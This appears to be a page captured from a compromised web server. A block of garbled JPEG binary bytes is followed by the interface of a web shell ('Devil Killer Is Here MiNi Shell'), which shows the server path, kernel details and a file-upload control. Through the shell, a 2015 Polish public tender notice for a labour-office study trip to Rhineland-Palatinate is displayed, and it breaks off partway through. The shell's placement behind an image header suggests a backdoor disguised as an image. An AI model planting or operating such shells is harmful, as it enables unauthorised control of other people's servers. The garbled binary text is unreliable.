JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150910/133815-N-2015.html

<p class="kh_header"><b>Opole: Organizacja wyjazdu studyjnego do regionu Nadrenii - Palatynatu obejmująca usługę transportową, hotelową i gastronomiczną w ramach projektu pn. Wsparcie kompetencji na starcie realizowanego przez Wojewódzki Urząd Pracy w Opolu</b><br>
<b>Numer ogłoszenia: 133815 - 2015; data zamieszczenia: 10.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 0-77 4416701, faks 0-77 4416702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wyjazdu studyjnego do regionu Nadrenii - Palatynatu obejmująca usługę transportową, hotelową i gastronomiczną w ramach projektu pn. Wsparcie kompetencji na starcie realizowanego przez Wojewódzki Urząd Pracy w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego usługi organizacji wyjazdu studyjnego do regionu Nadrenii-Palatynatu obejmującej usługę transportową, hotelową i gastronomiczną w ramach projektu pn. Wsparcie kompetencji na starcie, realizowanego przez Wojewódzki Urząd Pracy w Opolu w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy Programu Operacyjnego Kapitał Ludzki 2007-2013 dla przedstawicieli Wojewódzkiego Urzędu Pracy w Opolu, Urzędu Marszałkowskiego Województwa Opolskiego, Powiatowych Urzędów Pracy i innych instytucji rynku pracy. 

1.	Informacje ogólne:
1)	Miejsce docelowe wizyty studyjnej: Niemcy, region Nadrenia-Palatynat, miasta: Moguncja-Mainz, Trewir-Trier i Bitburg.
2)	Termin realizacji: Wyjazd odbędzie się w terminie 19 - 23.10.2015 r. 
3)	Liczba dni wizyty studyjnej: 5 dni - w tym 4 noclegi.
4)	Uczestnicy: pracownicy Wojewódzkiego Urzędu Pracy w Opolu, Urzędu Marszałkowskiego Województwa Opolskiego, Powiatowych Urzędów Pracy i innych instytucji rynku pracy. 
5)	Liczba uczestników: 12-17 osób. Ostateczna lista uczestników zostanie przesłana Wykonawcy na 5 dni roboczych przed datą wyjazdu
6)	Środek transportu: autokar.

2.	Zakres usługi transportowej:
1)	Wykonawca zobowiązany jest do zapewnienia przewozu autokarem uczestników wizyty studyjnej na trasach:
a)	w pierwszym dniu wyjazdu - przejazd z miejsca zbiórki w Opolu (ul. Głogowska 25c) do miejsca noclegu (hotelu) w Mainz-Moguncja,
b)	w drugim dniu wyjazdu - przejazdy pomiędzy miejscami uwzględnionymi w poszczególnych punktach programu,
c)	w trzecim dniu wyjazdu - przejazdy pomiędzy miejscem noclegu (hotelem) w Mainz-Moguncji, a miejscami uwzględnionymi w poszczególnych punktach programu i miejscem noclegu (hotelem) w Trier-Trewir,
d)	w czwartym dniu wyjazdu - przejazdy pomiędzy miejscami uwzględnionymi w poszczególnych punktach programu,
e)	w piątym dniu wyjazdu - przejazd z  miejsca noclegu (hotelu) w Trier-Trewirze do miejsca wskazanego przez Zamawiającego w Opolu (ul. Głogowska 25c).
2)	Przez cały czas trwania wyjazdu autokar ma posiadać ważne badania techniczne pojazdu oraz ma być dopuszczony do wykonywania międzynarodowego transportu drogowego.
3)	Wszelkie koszty związane z wykonywaniem przewozu, ubezpieczeniem oraz noclegiem i wyżywieniem kierowców, opiekuna oraz innymi opłatami wynikającymi z podróży (m.in. opłata za miejsca parkingowe, autostradę, paliwo, itp.) ponosi Wykonawca.
4)	Wykonawca gwarantuje, że wszystkie przejazdy odbywać się będą bezpiecznym i odpowiednio do tego celu przystosowanym środkiem transportu tj. autokarem  nie starszym niż wyprodukowany w 2008 r., posiadającym siedzenia w układzie konferencyjnym, wyposażonym w rozstawiane fotele przystosowane do długich tras, klimatyzację,  min. 3 monitory, wyjścia multimedialne z możliwością podłączenia laptopa i przekaz obrazu na monitory pokładowe, min. 3 gniazdka pokładowe 230 V, automat do serwowania gorących napojów, WC wraz z umywalką dostępne w każdym momencie trwania podróży.
5)	W przypadku awarii pojazdu Wykonawca zapewni w ciągu 3 godzin pojazd zastępczy nie gorszy niż pojazd, w którym rozpoczęto podróż. Koszty zapewnienia transportu zastępczego ponosi Wykonawca. 
6)	W przypadku nagłej choroby kierowcy wykonującego przewóz bądź wystąpienia innych przyczyn powodujących niemożność prowadzenia pojazdu Wykonawca zapewni w ciągu 3 godzin - kierowcę zastępczego. Koszty zapewnienia kierowcy zastępczego ponosi Wykonawca.

3.	Zakres usługi organizacji i realizacji wizyty studyjnej:
1)	Wykonawca zobowiązany jest do zapewnienia 4 noclegów dla każdego uczestnika wyjazdu, a także wskazanego przez Zamawiającego tłumacza według następującego podziału:
a)	pierwszy i drugi nocleg w miejscowości Mainz-Moguncja (Niemcy), w hotelu  znajdującym się w odległości maksymalnie 5 km w linii prostej od dworca głównego (Bahnhofplatz 6, 55116 Mainz), z zastrzeżeniem, iż oba noclegi dla wszystkich uczestników muszą odbyć się w tym samym hotelu,
b)	trzeci i czwarty nocleg w miejscowości Trier-Trewir (Niemcy), w hotelu położonym maksymalnie 5 km w linii prostej od katedry w Trier-Trewirze (Liebfrauenstr.12, 54290 Trier); z zastrzeżeniem, iż oba noclegi dla wszystkich uczestników muszą odbyć się w tym samym hotelu.
2)	Zamawiający wymaga zapewnienia noclegów w hotelach o standardzie co najmniej 3 - gwiazdkowym lub równoważnym, w pokojach 1 - osobowych dla osób niepalących z łazienkami w każdym pokoju, z dostępem do bezpłatnego, bezprzewodowego Internetu (WiFi) w każdym pokoju oraz zapleczem gastronomicznym w hotelu oraz salą konferencyjną.
3)	Sala konferencyjna w hotelu musi być udostępniona na potrzeby organizacji spotkania w dniu 20 października 2015 r. w godz. 13.00-17.00. Sala konferencyjna musi być wyposażona w krzesła i stoły dla 20 osób, rzutnik, laptop oraz ekran.
4)	Nie dopuszcza się możliwości przenoszenia żadnego uczestnika ani tłumacza do innego hotelu po odbyciu części noclegów, poza przemieszczaniem się zgodnie z programem wizyty.
5)	Wszyscy uczestnicy oraz tłumacz w każdym miejscu noclegu muszą być zakwaterowani w tym samym hotelu, pod tym samym adresem.
6)	Wykonawca zobowiązany jest do zapewnienia wyżywienia dla uczestników, a także wskazanego przez Zamawiającego tłumacza na zasadach określonych w pkt. 8-12.
7)	Ponadto wykonawca jest zobowiązany do zapewnienia, na zasadach określonych w pkt. 10-12, w drugim, w trzecim i w czwartym dniu: obiadu oraz poczęstunku kawowego dla maksymalnie trzech dodatkowych osób, wskazanych przez Zamawiającego spożywanych wspólnie z uczestnikami wyjazdu.
8)	Dzień drugi (wtorek):
a)	śniadanie w Mainz-Moguncja w hotelu, w którym będą odbywały się noclegi,
b)	obiad w restauracji położonej na terenie miasta Mainz - w godz. 12:00 - 14:00,
c)	poczęstunek kawowy podany bezpośrednio po obiedzie, w tym samym miejscu co obiad.
Dzień trzeci (środa):
a)	śniadanie w Mainz-Moguncja w hotelu, w którym będą odbywały się noclegi,
b)	obiad w restauracji położonej w regionie, w godz. 12:00 - 14:00,
c)	poczęstunek kawowy podany bezpośrednio po obiedzie, w tym samym miejscu co obiad.
Dzień czwarty (czwartek):
a)	śniadanie w Trier-Trewirze w hotelu, w którym będą odbywały się noclegi,
b)	obiad w restauracji położonej na trasie Trier - Bitburg (Nadrenia-Palatynat) w godz. 12:00 - 14:00,
c)	poczęstunek kawowy podany bezpośrednio po obiedzie, w tym samym miejscu co obiad.
Dzień piąty (piątek): śniadanie w Trier-Trewirze w hotelu, w którym będą odbywały się noclegi.
9)	Każde  śniadanie dla każdego uczestnika oraz tłumacza ma być podane w formie bufetu.
10)	Każdy obiad dla każdego uczestnika oraz tłumacza ma składać się z co najmniej następujących elementów:
a)	przystawki lub zupy - min. 250 ml
b)	ciepłego dania głównego obejmującego:
-	 mięso lub rybę lub danie jarskie - min. 200 g,
-	dodatek skrobiowy - min. 150 g,
-	sos - min. 50 ml,
-	surówki lub sałaty - min. 150 g,
c)	napojów obejmujących:
-	sok - 2 rodzaje łącznie min. 250 ml,
-	wodę mineralną gazowaną - min. 250 ml,
-	wodę mineralną niegazowaną - min. 250 ml,
11)	Menu obiadowe ma zostać tak dobrane, aby każdy uczestnik oraz tłumacz w każdym dniu wyjazdu miał prawo wyboru dania głównego mięsnego, rybnego bądź dania głównego jarskiego. Zamawiający nie dopuszcza, aby w ciągu 5 dni wyjazdu wystąpiła powtarzalność tego samego rodzaju posiłku. 
12)	Każdy poczęstunek kawowy dla każdego uczestnika oraz tłumacza ma składać się z co najmniej następujących elementów:
a)	kawa lub herbata w zależności od preferencji uczestników - min. 200 ml,
b)	śmietanka lub mleko do kawy - min. 20 g,
c)	świeża cytryna w plasterkach - min. 2 plasterki cytryny,
d)	cukier - min. 10 g.
13)	Wykonawca zobowiązany jest do ubezpieczenia od następstw nieszczęśliwych wypadków (NNW) oraz kosztów leczenia każdego uczestnika na czas przejazdu i pobytu na kwotę co najmniej 20.000,00 zł. 
14)	Wykonawca zobowiązany jest ubezpieczyć bagaż każdego z uczestników wyjazdu na kwotę co najmniej 2.000,00 zł.
15)	Wykonawca zobowiązany jest do przekazania Zamawiającemu kopii polisy ubezpieczenia wraz z dowodem jej opłacenia najpóźniej na 3 dni robocze przed datą rozpoczęcia wyjazdu.
16)	Wykonawca zapewni opiekuna grupy przez cały czas trwania wizyty. Opiekun grupy odpowiedzialny będzie za koordynowanie wizyty studyjnej w zakresie: transportu (od momentu wyjazdu do momentu powrotu), wyżywienia, zakwaterowania, przestrzegania programu technicznego, kompatybilności programu technicznego i merytorycznego. Opiekun grupy będzie osobą posługującą się językiem niemieckim w stopniu komunikatywnym. Opiekun musi być dostępny dla uczestników przez 24 godziny na dobę przez cały czas wyjazdu.

4.	WYMAGANIA DOTYCZĄCE ZAKRESU PROGRAMU MERYTORYCZNO - ORGANIZACYJNEGO
1)	W ramach wyjazdu Wykonawca dostosuje organizację usługi do przedstawionego przez Zamawiającego programu merytorycznego. Program merytoryczny obejmował będzie wizyty w instytucjach związanych z rynkiem pracy tj.: Ministerstwo ds. Socjalnych, Pracy, Zdrowia oraz Demografii Kraju Związkowego Nadrenii-Palatynatu; Agencja Pracy w Trier-Trewirze; Centrum Kształcenia Zawodowego Bitburg-Prüm; Instytut ds. Badań Rynku Pracy i Zawodów Krajowej Agencji Pracy - Oddział Regionalny:
a)	dzień pierwszy - transport na trasie Opole-Mainz (hotel), w trakcie którego odbywać się będzie spotkanie i prezentacja multimedialna biorących udział w wyjeździe specjalistów ds. metodologii jako wprowadzenie do tematyki wyjazdu  pn. Rynek pracy i polityka zatrudnienia celem opracowania strategii uzyskania niezbędnych informacji, analiz, badań dot. prognozowania rynku pracy w tym zapotrzebowania na zawody deficytowe, porównanie systemu dualnego w Polsce i w Niemczech celem zobrazowania różnic w oby systemach, 
b)	dzień drugi - wizyta w Ministerstwie ds. Socjalnych, Pracy, Zdrowia oraz Demografii Kraju Związkowego Nadrenii-Platynat, spotkanie w sali konferencyjnej hotelu z ekspertem z Instytutu ds. Badań Rynku Pracy i Zawodów Krajowej Agencji Pracy - Oddział Regionalny Nadrenia-Platynat - Kraj Saary, 
c)	dzień trzeci - przejazd do Trewiru-Trier i wizyta w Agentur fur Arbeit-Urząd Pracy Trier, 
d)	dzień czwarty - przejazd do Bitburga i wizyta w Centrum Kształcenia Zawodowego Bitburg-Prum, połączona ze zwiedzaniem miasta Trewir-Trier,
e)	dzień piąty - transport na trasie Trewir-Trier - Opole, w trakcie którego nastąpi podsumowanie wizyty studyjnej wraz z prezentacją zebranych materiałów dydaktycznych niezbędnych do powstania raportu i poradnika dla doradców zawodowych.
2)	Każda wizyta przewidywana jest na max. 2 godziny.
3)	Godziny spotkań w poszczególnych instytucjach ustali Zamawiający i poinformuje o nich Wykonawcę najpóźniej na 7 dni przed planowanym terminem wyjazdu.
4)	Dodatkowo Zamawiający dopuszcza możliwość wprowadzania zmian w programie merytorycznym na każdym etapie trwania wyjazdu, w tym w szczególności wykonanie dodatkowych przejazdów w zakresie niewskazanym w poszczególnych punktach programu merytorycznego. 
5)	Wykonawca zorganizuje dwie dwugodzinne wycieczki (obejmujące dojazd, powrót i zwiedzanie) największych atrakcji turystycznych Moguncji-Mainz i Trewiru-Trier, które odbędą się przykładowo w drugim, trzecim bądź  w czwartym dniu wyjazdu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 60.10.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający wymaga wniesienia wadium w wysokości 1.300,00 zł (słownie: tysiąc trzysta zł 00/100)
2)	Wadium może być wnoszone w jednej lub w kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275 z późn. zm.)
3)	Wadium należy wnieść przed  upływem terminu składania ofert w następujący sposób: 
a)	w przypadku pieniądza wpłaca się je w wymaganej kwocie przelewem na rachunek bankowy wskazany przez Zamawiającego, w Banku Millennium S.A., nr rachunku: 29 1160 2202 0000 0000 4170 1843 (kopię potwierdzenia wpłaty proszę dołączyć do oferty), 
b)	w przypadku gwarancji i poręczeń należy oryginał dokumentu dołączyć do oferty 
i złożyć w jednej kopercie z ofertą.
4)	Zwrot wadium:
a) Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem art. 46 ust. 4a ustawy prawo zamówień publicznych.
b) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
c) Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
5)	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1  ustawy prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania  jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
6)	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
7)	Zatrzymanie wadium przez Zamawiającego:
Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy prawo zamówień publicznych, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy (jeżeli było wymagane),
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8)	Okres ważności wadium:
Wykonawca zabezpiecza ofertę wymaganą kwotą wadium na okres 30 dni licząc od daty upływu terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wpis do Rejestru Operatorów Turystyki i Pośredników Turystycznych zgodnie z art. 4 ust. 1 ustawy z dnia 29 sierpnia 1997 r.  o usługach turystycznych (Dz. U. z 2014 r., poz. 196 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie - zrealizował co najmniej 3 wyjazdy zagraniczne dla grup zorganizowanych liczących minimum 15 osób na terenie Europy, z wyłączeniem obszaru Polski</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada autokar  nie starszy niż wyprodukowany w 2008 r., posiadający siedzenia w układzie konferencyjnym, wyposażony w rozstawiane fotele przystosowane do długich tras, klimatyzację,  min. 3 monitory, wyjścia multimedialne z możliwością podłączenia laptopa i przekaz obrazu na monitory pokładowe, min. 3 gniazdka pokładowe 230 V, automat do serwowania gorących napojów, WC wraz z umywalką dostępne w każdym momencie trwania podróży</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości min. 20.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
